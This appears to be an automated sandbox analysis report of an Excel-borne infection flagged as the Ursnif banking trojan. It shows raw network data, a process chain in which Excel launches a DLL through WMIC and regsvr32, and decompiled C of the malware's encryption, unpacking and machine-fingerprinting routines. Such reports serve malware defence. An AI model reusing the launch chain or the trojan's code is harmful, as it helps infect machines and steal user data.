                                  2021-10-21 17:40:39 UTC266INData Raw: a5 78 95 49 49 fe c9 da 8f d3 bd 4e 78 85 00 94 4e 49 00 ce 6e 95 fe 95 ff 49 ff be ff ac 4a ff 4a 86 4a fe 8a fe 99 fe ff 4e d4 78 fe 86 2d 77 86 ff 00 ff 97 5c ff d3 81 b2 fe 49 3e 96 49 95 95 50 bd bb fe 72 86 90 ff 96 d4 d3 be bd 5e ff 52 fe ff 95 49 52 d3 c8 49 ba ff ac d3 b9 96 49 86 49 be 96 86 da ff c3 00 8c 5f 77 a9 4a fe ff 7a be fe 9c 78 85 96 4a fe 49 bb 86 50 ff 52 63 6f 49 95 be 49 51 9d be 34 4a 8d bb 4e c3 77 9f ff ff fe 85 85 be ff 78 95 3a 86 fe 4a ff d3 ff 87 d3 ff fe b8 95 ff 86 d4 b3 4a d4 87 8e be 49 fe 85 85 fe 96 fe d4 a1 d4 50 81 78 6b 96 4a 8e 9d 4a 7b 6b 7c 3a 96 d4 6f c7 ba bd 49 bd ff ff 9a 84 4a fe 4a 96 68 39 fe 49 49 b6 49 3b fe 49 d4 d3 fe 6d 96 be 5c 42 49 fe fe 4c ff 96 95 d4 86 a7 6c ff 86 ff b6 00 ba ff da fe ff 85 00
                                  Data Ascii: xIINxNInIJJJNx-w\I>IPr^RIRIII_wJzxJIPRcoIIQ4JNwx:JJIPxkJJ{k|:oIJJh9III;Im\BILl
                                  2021-10-21 17:40:39 UTC273INData Raw: ff 75 55 ff 73 d9 ff fe 95 86 fe 49 ff d3 da d9 bd 6b 74 4a be 86 96 95 00 ad ff 00 6c d3 4a ff 86 8f 85 b4 ff 34 96 ff 94 2b 6b 96 ff 34 ff fe 97 82 be bd bc da aa 95 49 4a ff 8d 00 4a 49 ff be ff 4a a9 86 49 96 85 ff 00 d4 49 86 b8 35 b5 86 49 ff ff 91 86 d3 ff 6c d4 95 9d b8 00 ff c3 85 95 86 4d ff 6c 95 6e 86 50 7f 5a a3 5c fe fe ff 86 85 e7 ff ff 4a 8d fe 49 ff 5a bd 4a fe d3 3a 95 d9 d3 86 7f 2d da 4e 4e 00 96 86 96 ff da da 86 49 d3 85 00 95 3f 96 ff 49 fe 96 ff 40 95 b4 00 fe 82 96 4a 7d b1 68 ff 95 4a fe 4a 85 96 d4 b7 4a ff 6e ff 6f 00 be 6b 96 ff fe fe bd fe 93 4a 89 5c ff 6a 4a 3a d3 79 d4 bc fe ce 6f 4a 85 99 ff 96 ff 49 be 80 ba 85 86 6a ff a9 ce da 8a ff 00 ff 00 b3 56 be d4 51 78 d0 7d ff fe 00 98 5e 85 fe a0 85 c6 72 00 fe be b2 52 c3 3b
                                  Data Ascii: uUsIktJlJ4+k4IJJIJII5IlMlnPZ\JIZJ:-NNI?I@J}hJJJnokJ\jJ:yoJIjVQx}^rR;
                                  2021-10-21 17:40:39 UTC281INData Raw: fe d3 a9 96 96 50 4a af 75 4a ff 4b 96 85 fe 85 fe 96 86 fe bd da 86 6a 8e 86 ff af fe d3 60 4f d3 86 86 96 95 ff b6 85 63 bd fe bf 96 92 97 96 fe fe 65 fe 6b 40 ff ff 85 86 7b da a7 85 d9 da 7a 00 fe cc ff 4a bd fe ff 96 d3 96 ba 50 45 4a 6b 95 fe b4 d3 43 95 96 49 ff 4a d3 fe ff 86 fe ff 86 2a ff fe 4f be 4a 50 6b 52 ff ff fe 3a 84 86 96 96 86 fe 51 fe 86 00 fe fe ff 86 95 4a 4a ff 96 42 50 80 2d d4 95 ab cb 00 ff 86 ac 96 49 72 a1 6c 96 6c 85 ff 86 6c ff 56 49 d3 da 96 ff 5c bd fe ff ff 50 4a c7 fe 52 49 fe ff 85 49 ff 95 ff 95 4a fe ff b6 fe 4a d4 ff ff a4 20 95 a7 4b fe 4a 93 95 86 4a 4d fe 49 fe 85 95 85 6b 4a 5a d0 ff fe fe d4 d4 fe 50 b8 fe ff 86 bb d4 ff ab ff fe 51 fe be 95 5a 88 96 be fe 96 49 86 7a d9 da 86 00 00 50 a1 96 9f 58 ff ff b7 86 2d
                                  Data Ascii: PJuJKj`Ocek@{zJPEJkCIJ*OJPkR:QJJBP-IrlllVI\PJRIIJJ KJJMIkJZPQZIzPX-
                                  2021-10-21 17:40:39 UTC289INData Raw: 96 d3 86 ff ff 85 49 86 a6 2d fe 49 fe 3e 4a 95 50 00 ff 4a 95 6d 00 96 4a 49 4c fe 82 ff 95 4a de 86 89 ff fe 8e 6c fe 86 00 bd 49 cc fe ff 8d 00 85 84 c4 4a 89 bd 4a d3 fe ff ff 00 2d fe 4a 85 85 4a fe 62 85 a9 85 fe 4a 56 4a ff 47 96 5a fe c6 96 ff d4 4d 00 ff d6 95 4a a5 95 a4 86 86 bd 4a fe ff 96 86 00 b4 4a ad 49 ad 49 ff fe 7e 9c d4 ff 78 6a da ff fe fe 96 96 d4 49 95 4a 96 77 6b a3 00 96 4a fe ff fe 84 cb c3 d3 96 34 e6 49 49 d4 4e bf 4a ff 9f d4 4a ff fe a9 96 3a 86 2d ab 96 94 9f aa 95 d9 fe a6 d3 ff ff 85 00 ff 96 ff d9 3e c6 86 96 da d3 b6 be bd fe 4a d9 cf ff 86 66 ff 6a 5f 99 51 4a 6b 4a fe d4 be 51 96 d4 fe a1 95 be a7 ff ff 00 ff d3 62 35 00 95 2a 85 a7 ba 2c c9 9c d4 95 da ff 4a 4a 4a ff 86 fe 8c 3b ff ff ff 85 d3 fe fe 4a d9 ff ba 9a ac
                                  Data Ascii: I-I>JPJmJILJlIJJ-JJbJVJGZMJJJII~xjIJwkJ4IINJJ:->Jfj_QJkJQb5*,JJJ;J
                                  2021-10-21 17:40:39 UTC297INData Raw: ff 49 86 ff ff 3a 96 49 85 bb 95 d4 66 fe 00 4a 51 83 ad 6b bd b3 9b ff 78 4d 00 fe d9 c8 76 ff 86 99 85 6b 86 3b 00 d9 d9 96 fe fe fe fe be 91 ff fe 4a fe 49 ba e6 5a d3 fe 3a ff ca 6b d4 4a 4a ff 96 4a ff ff ff 4c ff 99 4a 49 4e 78 ff 86 8a 49 ff a4 6f dc ff 96 85 7e 85 85 82 fe 49 ff b4 3b 95 ff ba 00 00 00 95 fe 4d ff 90 86 96 ff 6c 95 ff fe 4a 95 86 4a ff 3b 49 bd ff fe 95 86 ff 4b ff ff ff 00 d0 49 3b 86 4a fe be 4a 5f da 86 3a 95 a7 c1 c8 fe 00 ff 6b fe 49 8e dc 4a 95 00 85 4a a9 95 d9 85 95 ac 78 85 86 39 68 ff 95 ff fe 4a ff 6c 4a 4a d4 74 86 c9 ff 8b 49 d6 b4 4a ff 00 ff c1 86 fe d9 4a ff fe 4a 96 2d 4a ff 9f ff 49 00 fe d3 49 ff 85 fe 4a ff 00 75 86 4a 95 ff 50 95 6e 00 fe 85 84 4a 4f 96 86 95 86 ff d9 ff e7 50 82 5b da be 49 4c be 78 ff 96 5a
                                  Data Ascii: I:IfJQkxMvk;JIZ:kJJJLJINxIo~I;MlJJ;IKI;JJ_:kIJJx9hJlJJtIJJJ-JIIJuJPnJOP[ILxZ



                                  System Behavior

                                  General

                                  Start time:19:41:16
                                  Start date:21/10/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13fdb0000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:19:41:20
                                  Start date:21/10/2021
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
                                  Imagebase:0xff4a0000
                                  File size:566272 bytes
                                  MD5 hash:FD902835DEAEF4091799287736F3A028
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate

                                  General

                                  Start time:19:41:22
                                  Start date:21/10/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:regsvr32 -s C:\Users\Public\codec.dll
                                  Imagebase:0xffda0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:19:41:23
                                  Start date:21/10/2021
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline: -s C:\Users\Public\codec.dll
                                  Imagebase:0x3e0000
                                  File size:14848 bytes
                                  MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, Author: Joe Security
                                  Reputation:moderate

                                  Disassembly

                                  Code Analysis


                                    Executed Functions

                                    Control-flow Graph

                                    C-Code - Quality: 50%
                                    			E001A3FAB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                    				int _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				void* _v20;
                                    				long* _v24;
                                    				void* _v39;
                                    				char _v40;
                                    				void _v56;
                                    				int _v60;
                                    				intOrPtr _v64;
                                    				void _v67;
                                    				char _v68;
                                    				void* _t61;
                                    				signed int _t76;
                                    				int _t79;
                                    				int _t81;
                                    				void* _t85;
                                    				long _t86;
                                    				int _t90;
                                    				signed int _t94;
                                    				int _t101;
                                    				void* _t102;
                                    				int _t103;
                                    				void* _t104;
                                    				void* _t105;
                                    				void* _t106;
                                    
                                    				_t103 = __eax;
                                    				_t94 = 6;
                                    				_v68 = 0;
                                    				memset( &_v67, 0, _t94 << 2);
                                    				_t105 = _t104 + 0xc;
                                    				asm("stosw");
                                    				asm("stosb");
                                    				_v40 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosw");
                                    				asm("stosb");
                                    				_t61 =  *0x1aa0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                    				if(_t61 == 0) {
                                    					_a8 = GetLastError();
                                    				} else {
                                    					_t101 = 0x10;
                                    					memcpy( &_v56, _a8, _t101);
                                    					_t106 = _t105 + 0xc;
                                    					_v60 = _t101;
                                    					_v67 = 2;
                                    					_v64 = 0x660e;
                                    					_v68 = 8;
                                    					if(CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12) == 0) {
                                    						_a8 = GetLastError();
                                    					} else {
                                    						_push(0);
                                    						_push( &_v40);
                                    						_push(1);
                                    						_push(_v12);
                                    						if( *0x1aa0b8() == 0) {
                                    							_a8 = GetLastError();
                                    						} else {
                                    							_t18 = _t103 + 0xf; // 0x10
                                    							_t76 = _t18 & 0xfffffff0;
                                    							if(_a4 != 0 && _t76 == _t103) {
                                    								_t76 = _t76 + _t101;
                                    							}
                                    							_t102 = E001A77D7(_t76);
                                    							_v20 = _t102;
                                    							if(_t102 == 0) {
                                    								_a8 = 8;
                                    							} else {
                                    								_v16 = 0;
                                    								_a8 = 0;
                                    								while(1) {
                                    									_t79 = 0x10;
                                    									_v8 = _t79;
                                    									if(_t103 <= _t79) {
                                    										_v8 = _t103;
                                    									}
                                    									memcpy(_t102, _a12, _v8);
                                    									_t81 = _v8;
                                    									_a12 = _a12 + _t81;
                                    									_t103 = _t103 - _t81;
                                    									_t106 = _t106 + 0xc;
                                    									if(_a4 == 0) {
                                    										_t85 =  *0x1aa0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                    									} else {
                                    										_t85 =  *0x1aa0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                    									}
                                    									if(_t85 == 0) {
                                    										break;
                                    									}
                                    									_t90 = _v8;
                                    									_v16 = _v16 + _t90;
                                    									_t102 = _t102 + _t90;
                                    									if(_t103 != 0) {
                                    										continue;
                                    									} else {
                                    										L17:
                                    										 *_a16 = _v20;
                                    										 *_a20 = _v16;
                                    									}
                                    									goto L21;
                                    								}
                                    								_t86 = GetLastError();
                                    								_a8 = _t86;
                                    								if(_t86 != 0) {
                                    									E001A77EC(_v20);
                                    								} else {
                                    									goto L17;
                                    								}
                                    							}
                                    						}
                                    						L21:
                                    						CryptDestroyKey(_v12);
                                    					}
                                    					CryptReleaseContext(_v24, 0);
                                    				}
                                    				return _a8;
                                    			}






























                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001A48AF,00000001,001A72E3,00000000), ref: 001A3FE3
                                    • memcpy.NTDLL(001A48AF,001A72E3,00000010,?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000), ref: 001A3FFC
                                    • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001A4025
                                    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001A403D
                                    • memcpy.NTDLL(00000000,00000000,032F9858,00000010), ref: 001A408F
                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,032F9858,00000020,?,?,00000010), ref: 001A40B8
                                    • GetLastError.KERNEL32(?,?,00000010), ref: 001A40E7
                                    • GetLastError.KERNEL32 ref: 001A4119
                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 001A4125
                                    • GetLastError.KERNEL32 ref: 001A412D
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001A413A
                                    • GetLastError.KERNEL32(?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A4142
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                    • String ID:
                                    • API String ID: 3401600162-0
                                    • Opcode ID: 1950cd468739f72187475dfb245e61fc0862e8da726a449428a0d1ae63117b1a
                                    • Instruction ID: 0e9a93257fffd42da741cbdd9c156f0247d5aa54570c41251a5a7ed953b686ca
                                    • Opcode Fuzzy Hash: 1950cd468739f72187475dfb245e61fc0862e8da726a449428a0d1ae63117b1a
                                    • Instruction Fuzzy Hash: 4F5178B6900208FFDF10DFA8DD88AEEBBB9EB45340F118429F901E6250D3749E94DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000968,00003000,00000040,00000968,6E2F8000), ref: 6E2F866D
                                    • VirtualAlloc.KERNEL32(00000000,00000240,00003000,00000040,6E2F8062), ref: 6E2F86A4
                                    • VirtualAlloc.KERNEL32(00000000,000128C5,00003000,00000040), ref: 6E2F8704
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2F873A
                                    • VirtualProtect.KERNEL32(6E2A0000,00000000,00000004,6E2F858F), ref: 6E2F883F
                                    • VirtualProtect.KERNEL32(6E2A0000,00001000,00000004,6E2F858F), ref: 6E2F8866
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2F858F), ref: 6E2F8933
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2F858F,?), ref: 6E2F8989
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2F89A5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Protect$Alloc$Free
                                    • String ID:
                                    • API String ID: 2574235972-0
                                    • Opcode ID: 2b87e025b5db9985b170cb8b537f892202ecd194b2c70d8a7afb6ce543d29950
                                    • Instruction ID: 89f1a54d78cf5b643910a4cae35f406eadd612d3373ad43b279e6708b255b6d9
                                    • Opcode Fuzzy Hash: 2b87e025b5db9985b170cb8b537f892202ecd194b2c70d8a7afb6ce543d29950
                                    • Instruction Fuzzy Hash: 45D18836680605DFDB14CF45C980B91BFBAFF9A714B0909A4ED099F29AD771B801CBB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 82%
                                    			E6E2A1A1C(intOrPtr _a4) {
                                    				void _v316;
                                    				signed int _v332;
                                    				long _v344;
                                    				long _v348;
                                    				char _v356;
                                    				char _v360;
                                    				long _v364;
                                    				long _v368;
                                    				void* __edi;
                                    				long _t25;
                                    				long _t28;
                                    				long _t31;
                                    				long _t32;
                                    				long _t36;
                                    				void* _t42;
                                    				intOrPtr _t44;
                                    				intOrPtr _t49;
                                    				long _t50;
                                    				void* _t56;
                                    				signed int _t59;
                                    				signed int _t60;
                                    				void* _t62;
                                    				intOrPtr* _t63;
                                    
                                    				_t25 = E6E2A1C6F();
                                    				_v348 = _t25;
                                    				if(_t25 != 0) {
                                    					L18:
                                    					return _t25;
                                    				} else {
                                    					goto L1;
                                    				}
                                    				do {
                                    					L1:
                                    					_v344 = 0;
                                    					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
                                    					_t50 = _t28;
                                    					_t59 = 0x13;
                                    					_t11 = _t50 + 1; // 0x1
                                    					_t60 = _v332 % _t59 + _t11;
                                    					_t31 = E6E2A18A0(0, _t60); // executed
                                    					_v368 = _t31;
                                    					Sleep(_t60 << 4);
                                    					_t25 = _v368;
                                    				} while (_t25 == 9);
                                    				if(_t25 != 0) {
                                    					goto L18;
                                    				}
                                    				_t32 = E6E2A1741(_t50); // executed
                                    				_v364 = _t32;
                                    				if(_t32 != 0) {
                                    					L16:
                                    					_t25 = _v364;
                                    					if(_t25 == 0xffffffff) {
                                    						_t25 = GetLastError();
                                    					}
                                    					goto L18;
                                    				}
                                    				if(_a4 != 0) {
                                    					L11:
                                    					_push(0);
                                    					_t62 = E6E2A1000(E6E2A1CDB,  &_v356);
                                    					if(_t62 == 0) {
                                    						_v368 = GetLastError();
                                    					} else {
                                    						_t36 = WaitForSingleObject(_t62, 0xffffffff);
                                    						_v368 = _t36;
                                    						if(_t36 == 0) {
                                    							GetExitCodeThread(_t62,  &_v368);
                                    						}
                                    						CloseHandle(_t62);
                                    					}
                                    					goto L16;
                                    				}
                                    				if(E6E2A1468(_t50,  &_v360) != 0) {
                                    					 *0x6e2a41b8 = 0;
                                    					goto L11;
                                    				}
                                    				_t49 = _v360;
                                    				_t63 = __imp__GetLongPathNameW;
                                    				_t42 =  *_t63(_t49, 0, 0); // executed
                                    				_t56 = _t42;
                                    				if(_t56 == 0) {
                                    					L9:
                                    					 *0x6e2a41b8 = _t49;
                                    					goto L11;
                                    				}
                                    				_t19 = _t56 + 2; // 0x2
                                    				_t44 = E6E2A2102(_t56 + _t19);
                                    				 *0x6e2a41b8 = _t44;
                                    				if(_t44 == 0) {
                                    					goto L9;
                                    				} else {
                                    					 *_t63(_t49, _t44, _t56); // executed
                                    					E6E2A2117(_t49);
                                    					goto L11;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 6E2A1C6F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2A1A30,74EC325B,00000000), ref: 6E2A1C7E
                                      • Part of subcall function 6E2A1C6F: GetVersion.KERNEL32 ref: 6E2A1C8D
                                      • Part of subcall function 6E2A1C6F: GetCurrentProcessId.KERNEL32 ref: 6E2A1C9C
                                      • Part of subcall function 6E2A1C6F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2A1CB5
                                    • NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 6E2A1A53
                                      • Part of subcall function 6E2A18A0: VirtualAlloc.KERNEL32(00000000,6E2A1A70,00003000,00000004,?,?,6E2A1A70,00000001), ref: 6E2A18F6
                                      • Part of subcall function 6E2A18A0: memcpy.NTDLL(?,?,6E2A1A70,?,?,6E2A1A70,00000001), ref: 6E2A1991
                                      • Part of subcall function 6E2A18A0: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E2A1A70,00000001), ref: 6E2A19AC
                                    • Sleep.KERNEL32(00000001,00000001), ref: 6E2A1A78
                                    • GetLongPathNameW.KERNEL32 ref: 6E2A1AC0
                                    • GetLongPathNameW.KERNEL32 ref: 6E2A1ADE
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2A1CDB,?,00000000), ref: 6E2A1B10
                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E2A1B24
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1B2B
                                    • GetLastError.KERNEL32(6E2A1CDB,?,00000000), ref: 6E2A1B33
                                    • GetLastError.KERNEL32 ref: 6E2A1B46
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                                    • String ID:
                                    • API String ID: 2016936029-0
                                    • Opcode ID: c95146e7707b46ef3d0a0bf7eba592fc92812841cffb27d64f2dcfe353f0283c
                                    • Instruction ID: cf232d89192480cb684de5ce46774c45d6ebf36d08a8e01e17090a18a6c650c7
                                    • Opcode Fuzzy Hash: c95146e7707b46ef3d0a0bf7eba592fc92812841cffb27d64f2dcfe353f0283c
                                    • Instruction Fuzzy Hash: 223180B550471AAB8740DFAD884899FB6EFBB85761F00091AFA55C2140EB70C589CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 69%
                                    			E6E2A109B(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                    				intOrPtr _v12;
                                    				struct _FILETIME* _v16;
                                    				short _v60;
                                    				struct _FILETIME* _t14;
                                    				intOrPtr _t15;
                                    				long _t18;
                                    				void* _t19;
                                    				void* _t22;
                                    				intOrPtr _t31;
                                    				long _t32;
                                    				void* _t34;
                                    
                                    				_t31 = __edx;
                                    				_t14 =  &_v16;
                                    				GetSystemTimeAsFileTime(_t14);
                                    				_push(0x192);
                                    				_push(0x54d38000);
                                    				_push(_v12);
                                    				_push(_v16);
                                    				L6E2A2220();
                                    				_push(_t14);
                                    				_v16 = _t14;
                                    				_t15 =  *0x6e2a41d0;
                                    				_push(_t15 + 0x6e2a505e);
                                    				_push(_t15 + 0x6e2a5054);
                                    				_push(0x16);
                                    				_push( &_v60);
                                    				_v12 = _t31;
                                    				L6E2A221A();
                                    				_t18 = _a4;
                                    				if(_t18 == 0) {
                                    					_t18 = 0x1000;
                                    				}
                                    				_t19 = CreateFileMappingW(0xffffffff, 0x6e2a41c0, 4, 0, _t18,  &_v60); // executed
                                    				_t34 = _t19;
                                    				if(_t34 == 0) {
                                    					_t32 = GetLastError();
                                    				} else {
                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                    						if(_t22 == 0) {
                                    							_t32 = GetLastError();
                                    							if(_t32 != 0) {
                                    								goto L9;
                                    							}
                                    						} else {
                                    							 *_a8 = _t34;
                                    							 *_a12 = _t22;
                                    							_t32 = 0;
                                    						}
                                    					} else {
                                    						_t32 = 2;
                                    						L9:
                                    						CloseHandle(_t34);
                                    					}
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E2A10A8
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2A10BE
                                    • _snwprintf.NTDLL ref: 6E2A10E3
                                    • CreateFileMappingW.KERNELBASE(000000FF,6E2A41C0,00000004,00000000,?,?), ref: 6E2A1108
                                    • GetLastError.KERNEL32 ref: 6E2A111F
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E2A1133
                                    • GetLastError.KERNEL32 ref: 6E2A114B
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1154
                                    • GetLastError.KERNEL32 ref: 6E2A115C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1724014008-0
                                    • Opcode ID: fb34ae1a125457e04276a1739b98be1498d6b759aedd265ae5c72e5a526184ef
                                    • Instruction ID: 982acb0dd414295e4523f6d93fd091775a86fb3021a750fe0d08ec8dfbe0d254
                                    • Opcode Fuzzy Hash: fb34ae1a125457e04276a1739b98be1498d6b759aedd265ae5c72e5a526184ef
                                    • Instruction Fuzzy Hash: 96218CF2640209BFDB00AFDCCC88E9E77AAEB49365F144025F615E7140D6B19989CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 281 1a2e33-1a2e47 282 1a2e49-1a2e4e 281->282 283 1a2e51-1a2e63 call 1a3569 281->283 282->283 286 1a2eb7-1a2ec4 283->286 287 1a2e65-1a2e75 GetUserNameW 283->287 288 1a2ec6-1a2edd GetComputerNameW 286->288 287->288 289 1a2e77-1a2e87 RtlAllocateHeap 287->289 290 1a2f1b-1a2f3d 288->290 291 1a2edf-1a2ef0 RtlAllocateHeap 288->291 289->288 292 1a2e89-1a2e96 GetUserNameW 289->292 291->290 293 1a2ef2-1a2efb GetComputerNameW 291->293 294 1a2e98-1a2ea4 call 1a1d41 292->294 295 1a2ea6-1a2eb5 HeapFree 292->295 296 1a2f0c-1a2f15 HeapFree 293->296 297 1a2efd-1a2f09 call 1a1d41 293->297 294->295 295->288 296->290 297->296
                                    C-Code - Quality: 96%
                                    			E001A2E33(char __eax, signed int* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v28;
                                    				long _t34;
                                    				signed int _t39;
                                    				int _t43;
                                    				long _t50;
                                    				char _t59;
                                    				intOrPtr _t61;
                                    				void* _t62;
                                    				void* _t63;
                                    				signed int* _t64;
                                    				char _t65;
                                    				intOrPtr* _t67;
                                    				void* _t68;
                                    				signed int* _t69;
                                    
                                    				_t69 = __esi;
                                    				_t65 = __eax;
                                    				_v8 = 0;
                                    				_v12 = __eax;
                                    				if(__eax == 0) {
                                    					_t59 =  *0x1aa2c8; // 0xeb872a02
                                    					_v12 = _t59;
                                    				}
                                    				_t64 = _t69;
                                    				E001A3569( &_v12, _t64);
                                    				if(_t65 != 0) {
                                    					 *_t69 =  *_t69 ^  *0x1aa2d0 ^ 0x46d76429;
                                    				} else {
                                    					GetUserNameW(0,  &_v8); // executed
                                    					_t50 = _v8;
                                    					if(_t50 != 0) {
                                    						_t62 = RtlAllocateHeap( *0x1aa290, 0, _t50 + _t50);
                                    						if(_t62 != 0) {
                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                    								_t63 = _t62;
                                    								 *_t69 =  *_t69 ^ E001A1D41(_v8 + _v8, _t63);
                                    							}
                                    							HeapFree( *0x1aa290, 0, _t62);
                                    						}
                                    					}
                                    				}
                                    				_t61 = __imp__;
                                    				_v8 = _v8 & 0x00000000;
                                    				GetComputerNameW(0,  &_v8); // executed
                                    				_t34 = _v8;
                                    				if(_t34 != 0) {
                                    					_t68 = RtlAllocateHeap( *0x1aa290, 0, _t34 + _t34);
                                    					if(_t68 != 0) {
                                    						_t43 = GetComputerNameW(_t68,  &_v8); // executed
                                    						if(_t43 != 0) {
